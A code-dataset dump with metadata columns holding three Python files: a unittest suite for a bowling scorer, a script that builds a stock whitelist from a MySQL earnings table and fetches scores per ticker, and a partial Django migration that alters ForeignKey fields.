hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
820049678d432737eb1818c775329bae2223497c | 3,982 | py | Python | exercises/practice/bowling/bowling_test.py | andjam19/z3 | a53fcd95a1dc79c6e8488b3cce6f8d94c62fef4d | [
"MIT"
] | 1 | 2021-03-18T20:51:18.000Z | 2021-03-18T20:51:18.000Z | exercises/practice/bowling/bowling_test.py | andjam19/z3 | a53fcd95a1dc79c6e8488b3cce6f8d94c62fef4d | [
"MIT"
] | 1 | 2021-04-19T00:30:35.000Z | 2021-04-19T00:30:35.000Z | exercises/practice/bowling/bowling_test.py | andjam19/z3 | a53fcd95a1dc79c6e8488b3cce6f8d94c62fef4d | [
"MIT"
] | null | null | null | import unittest
from z3 import*
from bowling import bowlingScore
class BowlingScoreTest(unittest.TestCase):
def test_all_zeros(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 0)
def test_all_strikes(self):
pins_per_roll = (10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10)
self.assertEqual(bowlingScore(pins_per_roll), 300)
def test_tenth_frame_all_strikes(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 10)
self.assertEqual(bowlingScore(pins_per_roll), 30)
def test_tenth_frame_first_two_strikes(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 2)
self.assertEqual(bowlingScore(pins_per_roll), 22)
def test_tenth_frame_first_one_strike(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 2, 2)
self.assertEqual(bowlingScore(pins_per_roll), 14)
def test_tenth_frame_strike_spare(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 2, 8)
self.assertEqual(bowlingScore(pins_per_roll), 20)
def test_tenth_frame_spare_strike(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 8, 10)
self.assertEqual(bowlingScore(pins_per_roll), 20)
def test_tenth_frame_spare(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 8, 6)
self.assertEqual(bowlingScore(pins_per_roll), 16)
def test_consecutive_strikes(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 10, 0, 0, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 65)
def test_consecutive_strikes_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 10, 7, 1, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 88)
def test_strike_strike_spare(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 5, 5, 0, 0, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 60)
def test_strike_strike_spare_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 10, 10, 5, 5, 7, 1, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 75)
def test_consecutive_spares(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 5, 5, 2, 7, 4, 6, 0, 0, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 36)
def test_consecutive_spares_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 5, 5, 2, 7, 4, 6, 7, 1, 0, 0, 0, 5)
self.assertEqual(bowlingScore(pins_per_roll), 51)
def test_single_strike(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 10)
def test_single_strike_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 5, 3, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 26)
def test_single_spare(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 7, 0, 0, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 10)
def test_single_spare_followed_by_number(self):
pins_per_roll = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 7, 5, 3, 0, 0, 0, 0)
self.assertEqual(bowlingScore(pins_per_roll), 23)
def test_all_open_frames(self):
pins_per_roll = (1, 2, 3, 4, 5, 4, 3, 2, 1, 0, 1, 2, 3, 4, 5, 4, 3, 2, 1, 0)
self.assertEqual(bowlingScore(pins_per_roll), 50)
def test_all_open_frames(self):
pins_per_roll = (5, 3, 8, 2, 3, 4, 8, 0, 10, 4, 4, 2, 6, 7, 2, 6, 1, 9, 0)
self.assertEqual(bowlingScore(pins_per_roll), 95)
if __name__ == "__main__":
unittest.main() | 45.770115 | 91 | 0.585635 | 735 | 3,982 | 2.955102 | 0.087075 | 0.221915 | 0.29558 | 0.344383 | 0.837937 | 0.802947 | 0.77256 | 0.700276 | 0.700276 | 0.633057 | 0 | 0.155593 | 0.259166 | 3,982 | 87 | 92 | 45.770115 | 0.580678 | 0 | 0 | 0.090909 | 0 | 0 | 0.002053 | 0 | 0 | 0 | 0 | 0 | 0.30303 | 1 | 0.30303 | false | 0 | 0.045455 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
822e4969fbf9d9fc830a89018d7092a3c75135d8 | 14,184 | py | Python | cbs_whitelist/white_list.py | ForrestLi/py_strategy | dab2b8afb9d9577219d4571cb36b408a5d82fee8 | [
"MIT"
] | null | null | null | cbs_whitelist/white_list.py | ForrestLi/py_strategy | dab2b8afb9d9577219d4571cb36b408a5d82fee8 | [
"MIT"
] | null | null | null | cbs_whitelist/white_list.py | ForrestLi/py_strategy | dab2b8afb9d9577219d4571cb36b408a5d82fee8 | [
"MIT"
] | null | null | null | '''
Created on Nov 14, 2020
@author: Forrest Li
'''
from sqlalchemy import create_engine
import pymysql
import pandas as pd
import chinastock as cs
#import cbs_score_urlopen as cscore
import cbs_score as cscore
import time
db_connection_str = 'mysql+pymysql://root:A1234567@localhost/ms_financials_db'
db_connection = create_engine(db_connection_str)
pd.set_option("display.max_rows", None, "display.max_columns", None)
ticker_df = pd.read_sql(
"""
SELECT * FROM ms_financials_db.morningstar_key_eps_percent where 3_year_average>20 and 5_year_average>18 and 10_year_average>15 and period in ('2019-12-31','2020-03-31','2020-06-30','2020-09-30')
order by 3_year_average desc
"""
, con=db_connection)
white_list=(ticker_df['ticker'].tolist())
#time.sleep(60)
cbs_d={}
#cbs_ch_d={'XHKG:02233': 'NAN', '000048': ['23.16', '33.14'], 'XHKG:00613': 'NAN', '600570': ['21.16', '56.91'], '300122': ['41.66', '69.49'], '600031': ['23.93', '35.12'], '600764': ['47.9', '66.7'], 'XHKG:00119': 'NAN', '600516': ['33.94', '81.85'], 'XHKG:00743': 'NAN', '600587': ['22.79', '21.55'], '600745': ['23.86', '34.79'], '300016': ['35.97', '73.97'], '005670': 'NAN', '300308': ['37.01', '37.58'], '002161': ['30.07', '21.92'], 'XHKG:00124': 'NAN', '601100': ['30.38', '52.41'], '000672': ['28.5', '58.15'], '600801': ['35.39', '51.68'], '000885': ['41.62', '41.83'], '300107': ['52.47', '75.52'], '000830': ['22.65', '47.49'], '000567': [], '300276': ['25.36', '20.35'], '601003': ['21.36', '59.57'], '000779': ['33.13', '73.13'], '300132': ['45.81', '67.9'], '002611': ['42.79', '49.76'], '003960': 'NAN', '300205': ['31.64', '32.53'], '000961': ['13.99', '12.32'], '002016': ['33.95', '71.7'], '600673': ['15.1', '54.65'], '300123': ['18.56', '24.44'], 'XHKG:01918': 'NAN', '600215': ['15.36', '19.48'], '300226': ['27.69', '28.08'], '000025': ['41.21', '46.01'], '200025': 'NAN', '600753': ['45.58', '74.91'], '600781': ['66.63', '52.87'], '006580': 'NAN', '000560': ['37.08', '19.07'], '600282': ['26.16', '56.48'], '001390': 'NAN', '600731': ['25.5', '38.01'], '600702': ['31.84', '42.31'], '600853': ['18.45', '23.47'], '600456': ['24.22', '18.51'], '000789': ['44.15', '60.38'], '600782': ['28.45', '65.21'], '600768': ['44.52', '67.37'], '600728': ['35.42', '37.17'], '600287': ['36.43', '37.36'], 'XHKG:03347': 'NAN', '300347': ['61.82', '64.9'], '600328': ['24.89', '42.53'], '002299': ['47.35', '26.75'], '600160': ['41.09', '63.12'], '002097': ['21.39', '21.19'], '600250': ['33.3', '53.93'], '002182': ['38.98', '32.55'], '600810': ['31.29', '31.99'], '600985': ['47.8', '56.07'], '000736': ['26.86', '37.18'], '600260': ['29.08', '41.76'], '000705': ['37.03', '36.02'], '002190': ['47.1', '23.95'], '300012': ['60.36', '43.97'], '000795': ['42.87', '53.19'], '002135': ['16.19', '22.94'], '600512': ['39.56', '42.93'], '002214': ['35.66', '31.01'], '002189': ['30.45', '42.74'], '601225': ['39.04', '61.6'], '600295': ['22.91', '28.77'], '002632': ['53.6', '58.71'], '600368': ['24.01', '29.95'], '600585': ['60.92', '79.78', '93.27', '94.96', '94.23', '92.99', '94.27', '94.96', '95.91', '95.35', '94.23'], 'XHKG:00914': 'NAN', '300236': ['50.0', '51.88'], '002384': ['27.96', '30.85'], '000906': ['44.38', '43.21'], '000757': ['45.78', '48.67'], '002458': ['71.16', '17.3'], '000656': ['31.86', '27.17'], '002746': ['81.96', '45.75'], '600132': ['44.67', '67.15'], '002475': ['57.46', '52.46'], '002127': ['80.32', '83.12'], '300198': ['44.22', '31.08'], '000661': ['74.81', '74.61'], '000061': ['19.86', '18.25'], '600466': ['28.56', '27.27'], '300285': ['66.58', '60.75'], 'XHKG:00581': 'NAN', '600052': ['51.1', '39.34'], 'XHKG:02007': 'NAN', '600763': ['79.52', '89.5'], '600846': ['37.83', '34.97'], '002605': ['49.03', '45.62'], '600559': ['54.97', '58.16'], '002541': ['32.31', '29.71'], '002599': ['28.02', '43.79'], '003230': 'NAN', '002080': ['27.99', '31.06'], '002175': ['31.61', '14.67'], '002088': ['50.18', '68.45'], '002099': ['49.83', '57.01'], '600809': ['63.97', '64.01'], '003090': 'NAN', 'XHKG:02382': 'NAN', '002057': ['58.7', '69.33'], '601016': ['21.87', '21.96'], '002648': ['39.41', '65.58'], '002371': ['31.99', '27.72'], '002601': ['35.5', '62.81'], '601012': ['70.69', '71.27', '54.99', '74.49', '74.83', '68.96', '71.78', '74.49', '79.38', '76.62', '74.83'], '002438': ['30.26', '25.32'], '000682': ['44.5', '61.03'], '000951': ['26.76', '39.34'], '600567': ['28.96', '49.5'], '300232': ['65.25', '54.41'], '601058': ['31.69', '30.09'], '002645': ['48.98', '56.85'], '300316': ['59.66', '50.1'], '002332': ['40.49', '47.3'], '600426': ['45.6', '48.35'], '300014': ['53.77', '45.64'], 'XHKG:00512': 'NAN', '600277': ['32.42', '43.74'], 'XHKG:00535': 'NAN', 'XHKG:01813': 'NAN', '600486': ['54.24', '63.15'], 'XHKG:01169': 'NAN', '300200': ['56.88', '38.92'], '002461': ['29.95', '32.58'], '601888': ['85.28', '89.36'], '600436': ['80.02', '83.23'], '601677': ['45.34', '45.08'], '002402': ['60.34', '69.64'], '601588': ['24.99', '28.62'], 'XHKG:00588': 'NAN', 'XHKG:01600': 'NAN', '600668': ['53.7', '58.7'], '000596': ['61.41', '68.71'], '200596': 'NAN', '600325': ['25.71', '21.93'], '000537': ['30.11', '35.02'], '000858': ['79.34', '83.35', '85.32', '85.99', '88.15', '87.29', '90.6', '85.99', '88.12', '88.33', '88.15'], 'XHKG:00189': 'NAN', '300003': ['64.23', '57.53'], '002439': ['65.43', '69.0'], '600956': ['22.93', '28.07'], 'XHKG:00956': 'NAN', '300137': ['64.74', '76.57'], '600519': ['88.47', '92.81', '93.62', '80.41', '84.69', '96.79', '98.03', '80.41', '85.57', '82.16', '84.69'], '002600': ['32.53', '59.04'], '300038': ['39.96', '56.68'], '300184': ['38.12', '53.07'], '002602': ['63.5', '62.3'], '601318': [], 'XHKG:02318': 'NAN', '600491': ['21.32', '20.39'], 'XHKG:01098': 'NAN', '000636': ['23.61', '37.75'], '600452': ['58.09', '52.72'], '600507': ['55.06', '70.62'], '002507': ['78.79', '78.02'], '300088': ['48.27', '49.36'], '300015': ['77.21', '77.58'], '300059': [], '000756': ['32.64', '42.06'], 'XHKG:00719': 'NAN', '300357': ['89.9', '88.82'], '600161': ['43.62', '88.83'], '000568': ['83.07', '85.29'], '601601': [], 'XHKG:02601': 'NAN', '002110': ['67.63', '83.69'], '600309': ['48.9', '60.65'], '002373': ['63.26', '66.35'], 'XHKG:00881': 'NAN', '002511': ['57.81', '58.14'], '002714': ['65.28', '68.74', '31.49', '77.49', '82.17', '31.29', '52.5', '77.49', '85.26', '84.98', '82.17'], '002035': ['73.36', '71.48'], 'XHKG:00700': 'NAN', '002020': ['46.72', '52.38'], '002139': ['55.11', '59.23'], '300383': ['54.27', '38.32'], '002262': ['73.35', '77.53'], '002221': ['38.71', '47.8'], '600667': ['36.87', '40.2'], 'XHKG:01061': 'NAN', '600340': ['39.04', '35.91'], 'XHKG:00095': 'NAN', '600577': ['46.66', '54.32'], '600995': ['45.42', '49.26'], 'XHKG:02020': 'NAN', 'XHKG:00384': 'NAN', '300365': ['78.14', '72.77'], '300031': ['69.37', '61.13'], '601799': ['54.28', '53.95'], 'XHKG:00098': 'NAN', '600529': ['62.45', '60.84'], '600276': ['90.39', '87.75', '84.51', '93.19', '92.87', '90.27', '93.66', '93.19', '90.95', '93.1', '92.87'], '600438': ['52.06', '54.93'], '002637': ['44.16', '32.15'], '300021': ['42.48', '37.58'], '600064': ['36.17', '34.9'], '600872': ['62.23', '62.92'], 'XHKG:00240': 'NAN', '601233': ['49.59', '53.53'], '002587': ['69.14', '59.87']}
for ticker in white_list:
#for k,v in cbs_ch_d.items():
print(ticker)
if 'XHKG' in ticker:
ticker = ticker[5:]
try:
cs_score=cscore.get_cbs_score(ticker)
print(cs_score)
if(cs_score==[]):
time.sleep(300)
else:
time.sleep(60)
cbs_d[ticker] = cs_score
except (RuntimeError, TypeError, NameError,AttributeError,ConnectionError) as E:
print(E)
print(cbs_d)
#{'XHKG:02233': 'NAN', '000048': ['23.16', '33.14'], 'XHKG:00613': 'NAN', '600570': ['21.16', '56.91'], '300122': ['41.66', '69.49'], '600031': ['23.93', '35.12'], '600764': ['47.9', '66.7'], 'XHKG:00119': 'NAN', '600516': ['33.94', '81.85'], 'XHKG:00743': 'NAN', '600587': ['22.79', '21.55'], '600745': ['23.86', '34.79'], '300016': ['35.97', '73.97'], '005670': 'NAN', '300308': ['37.01', '37.58'], '002161': ['30.07', '21.92'], 'XHKG:00124': 'NAN', '601100': ['30.38', '52.41'], '000672': ['28.5', '58.15'], '600801': ['35.39', '51.68'], '000885': ['41.62', '41.83'], '300107': ['52.47', '75.52'], '000830': ['22.65', '47.49'], '000567': [], '300276': ['25.36', '20.35'], '601003': ['21.36', '59.57'], '000779': ['33.13', '73.13'], '300132': ['45.81', '67.9'], '002611': ['42.79', '49.76'], '003960': 'NAN', '300205': ['31.64', '32.53'], '000961': ['13.99', '12.32'], '002016': ['33.95', '71.7'], '600673': ['15.1', '54.65'], '300123': ['18.56', '24.44'], 'XHKG:01918': 'NAN', '600215': ['15.36', '19.48'], '300226': ['27.69', '28.08'], '000025': ['41.21', '46.01'], '200025': 'NAN', '600753': ['45.58', '74.91'], '600781': ['66.63', '52.87'], '006580': 'NAN', '000560': ['37.08', '19.07'], '600282': ['26.16', '56.48'], '001390': 'NAN', '600731': ['25.5', '38.01'], '600702': ['31.84', '42.31'], '600853': ['18.45', '23.47'], '600456': ['24.22', '18.51'], '000789': ['44.15', '60.38'], '600782': ['28.45', '65.21'], '600768': ['44.52', '67.37'], '600728': ['35.42', '37.17'], '600287': ['36.43', '37.36'], 'XHKG:03347': 'NAN', '300347': ['61.82', '64.9'], '600328': ['24.89', '42.53'], '002299': ['47.35', '26.75'], '600160': ['41.09', '63.12'], '002097': ['21.39', '21.19'], '600250': ['33.3', '53.93'], '002182': ['38.98', '32.55'], '600810': ['31.29', '31.99'], '600985': ['47.8', '56.07'], '000736': ['26.86', '37.18'], '600260': ['29.08', '41.76'], '000705': ['37.03', '36.02'], '002190': ['47.1', '23.95'], '300012': ['60.36', '43.97'], '000795': ['42.87', '53.19'], '002135': ['16.19', '22.94'], '600512': ['39.56', '42.93'], '002214': ['35.66', '31.01'], '002189': ['30.45', '42.74'], '601225': ['39.04', '61.6'], '600295': ['22.91', '28.77'], '002632': ['53.6', '58.71'], '600368': ['24.01', '29.95'], '600585': ['60.92', '79.78', '93.27', '94.96', '94.23', '92.99', '94.27', '94.96', '95.91', '95.35', '94.23'], 'XHKG:00914': 'NAN', '300236': ['50.0', '51.88'], '002384': ['27.96', '30.85'], '000906': ['44.38', '43.21'], '000757': ['45.78', '48.67'], '002458': ['71.16', '17.3'], '000656': ['31.86', '27.17'], '002746': ['81.96', '45.75'], '600132': ['44.67', '67.15'], '002475': ['57.46', '52.46'], '002127': ['80.32', '83.12'], '300198': ['44.22', '31.08'], '000661': ['74.81', '74.61'], '000061': ['19.86', '18.25'], '600466': ['28.56', '27.27'], '300285': ['66.58', '60.75'], 'XHKG:00581': 'NAN', '600052': ['51.1', '39.34'], 'XHKG:02007': 'NAN', '600763': ['79.52', '89.5'], '600846': ['37.83', '34.97'], '002605': ['49.03', '45.62'], '600559': ['54.97', '58.16'], '002541': ['32.31', '29.71'], '002599': ['28.02', '43.79'], '003230': 'NAN', '002080': ['27.99', '31.06'], '002175': ['31.61', '14.67'], '002088': ['50.18', '68.45'], '002099': ['49.83', '57.01'], '600809': ['63.97', '64.01'], '003090': 'NAN', 'XHKG:02382': 'NAN', '002057': ['58.7', '69.33'], '601016': ['21.87', '21.96'], '002648': ['39.41', '65.58'], '002371': ['31.99', '27.72'], '002601': ['35.5', '62.81'], '601012': ['70.69', '71.27', '54.99', '74.49', '74.83', '68.96', '71.78', '74.49', '79.38', '76.62', '74.83'], '002438': ['30.26', '25.32'], '000682': ['44.5', '61.03'], '000951': ['26.76', '39.34'], '600567': ['28.96', '49.5'], '300232': ['65.25', '54.41'], '601058': ['31.69', '30.09'], '002645': ['48.98', '56.85'], '300316': ['59.66', '50.1'], '002332': ['40.49', '47.3'], '600426': ['45.6', '48.35'], '300014': ['53.77', '45.64'], 'XHKG:00512': 'NAN', '600277': ['32.42', '43.74'], 'XHKG:00535': 'NAN', 'XHKG:01813': 'NAN', '600486': ['54.24', '63.15'], 'XHKG:01169': 'NAN', '300200': ['56.88', '38.92'], '002461': ['29.95', '32.58'], '601888': ['85.28', '89.36'], '600436': ['80.02', '83.23'], '601677': ['45.34', '45.08'], '002402': ['60.34', '69.64'], '601588': ['24.99', '28.62'], 'XHKG:00588': 'NAN', 'XHKG:01600': 'NAN', '600668': ['53.7', '58.7'], '000596': ['61.41', '68.71'], '200596': 'NAN', '600325': ['25.71', '21.93'], '000537': ['30.11', '35.02'], '000858': ['79.34', '83.35', '85.32', '85.99', '88.15', '87.29', '90.6', '85.99', '88.12', '88.33', '88.15'], 'XHKG:00189': 'NAN', '300003': ['64.23', '57.53'], '002439': ['65.43', '69.0'], '600956': ['22.93', '28.07'], 'XHKG:00956': 'NAN', '300137': ['64.74', '76.57'], '600519': ['88.47', '92.81', '93.62', '80.41', '84.69', '96.79', '98.03', '80.41', '85.57', '82.16', '84.69'], '002600': ['32.53', '59.04'], '300038': ['39.96', '56.68'], '300184': ['38.12', '53.07'], '002602': ['63.5', '62.3'], '601318': [], 'XHKG:02318': 'NAN', '600491': ['21.32', '20.39'], 'XHKG:01098': 'NAN', '000636': ['23.61', '37.75'], '600452': ['58.09', '52.72'], '600507': ['55.06', '70.62'], '002507': ['78.79', '78.02'], '300088': ['48.27', '49.36'], '300015': ['77.21', '77.58'], '300059': [], '000756': ['32.64', '42.06'], 'XHKG:00719': 'NAN', '300357': ['89.9', '88.82'], '600161': ['43.62', '88.83'], '000568': ['83.07', '85.29'], '601601': [], 'XHKG:02601': 'NAN', '002110': ['67.63', '83.69'], '600309': ['48.9', '60.65'], '002373': ['63.26', '66.35'], 'XHKG:00881': 'NAN', '002511': ['57.81', '58.14'], '002714': ['65.28', '68.74', '31.49', '77.49', '82.17', '31.29', '52.5', '77.49', '85.26', '84.98', '82.17'], '002035': ['73.36', '71.48'], 'XHKG:00700': 'NAN', '002020': ['46.72', '52.38'], '002139': ['55.11', '59.23'], '300383': ['54.27', '38.32'], '002262': ['73.35', '77.53'], '002221': ['38.71', '47.8'], '600667': ['36.87', '40.2'], 'XHKG:01061': 'NAN', '600340': ['39.04', '35.91'], 'XHKG:00095': 'NAN', '600577': ['46.66', '54.32'], '600995': ['45.42', '49.26'], 'XHKG:02020': 'NAN', 'XHKG:00384': 'NAN', '300365': ['78.14', '72.77'], '300031': ['69.37', '61.13'], '601799': ['54.28', '53.95'], 'XHKG:00098': 'NAN', '600529': ['62.45', '60.84'], '600276': ['90.39', '87.75', '84.51', '93.19', '92.87', '90.27', '93.66', '93.19', '90.95', '93.1', '92.87'], '600438': ['52.06', '54.93'], '002637': ['44.16', '32.15'], '300021': ['42.48', '37.58'], '600064': ['36.17', '34.9'], '600872': ['62.23', '62.92'], 'XHKG:00240': 'NAN', '601233': ['49.59', '53.53'], '002587': ['69.14', '59.87']}
| 283.68 | 6,462 | 0.492809 | 2,355 | 14,184 | 2.948195 | 0.172399 | 0.008066 | 0.003457 | 0.004033 | 0.884632 | 0.880311 | 0.880311 | 0.880311 | 0.880311 | 0.880311 | 0 | 0.451102 | 0.110406 | 14,184 | 49 | 6,463 | 289.469388 | 0.099144 | 0.918923 | 0 | 0 | 0 | 0 | 0.114903 | 0.063709 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.214286 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
4144ee2a0bad933fc39b7a43a1bf7331e7d75894 | 2,785 | py | Python | tasksapi/migrations/0002_auto_20181204_2210.py | mwiens91/saltant | 9e72175a896f5859ada304ad3ae4d84dfc3834db | [
"MIT"
] | 3 | 2018-12-08T01:18:29.000Z | 2018-12-14T23:18:42.000Z | tasksapi/migrations/0002_auto_20181204_2210.py | saltant-org/saltant | db498a1186fc74221f8214ad1819dd03bf4b08ac | [
"MIT"
] | 3 | 2019-05-23T07:43:13.000Z | 2021-06-10T20:46:53.000Z | tasksapi/migrations/0002_auto_20181204_2210.py | saltant-org/saltant | db498a1186fc74221f8214ad1819dd03bf4b08ac | [
"MIT"
] | 2 | 2019-03-13T22:31:09.000Z | 2019-05-03T00:18:30.000Z | # Generated by Django 2.1.2 on 2018-12-05 06:10
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tasksapi', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='containertaskinstance',
name='task_queue',
field=models.ForeignKey(help_text='The queue this instance runs on.', on_delete=django.db.models.deletion.CASCADE, to='tasksapi.TaskQueue'),
),
migrations.AlterField(
model_name='containertaskinstance',
name='task_type',
field=models.ForeignKey(help_text='The task type for which this is an instance.', on_delete=django.db.models.deletion.CASCADE, to='tasksapi.ContainerTaskType'),
),
migrations.AlterField(
model_name='containertaskinstance',
name='user',
field=models.ForeignKey(help_text='The author of this instance.', null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='containertasktype',
name='user',
field=models.ForeignKey(help_text='The author of this task.', null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='executabletaskinstance',
name='task_queue',
field=models.ForeignKey(help_text='The queue this instance runs on.', on_delete=django.db.models.deletion.CASCADE, to='tasksapi.TaskQueue'),
),
migrations.AlterField(
model_name='executabletaskinstance',
name='task_type',
field=models.ForeignKey(help_text='The task type for which this is an instance.', on_delete=django.db.models.deletion.CASCADE, to='tasksapi.ExecutableTaskType'),
),
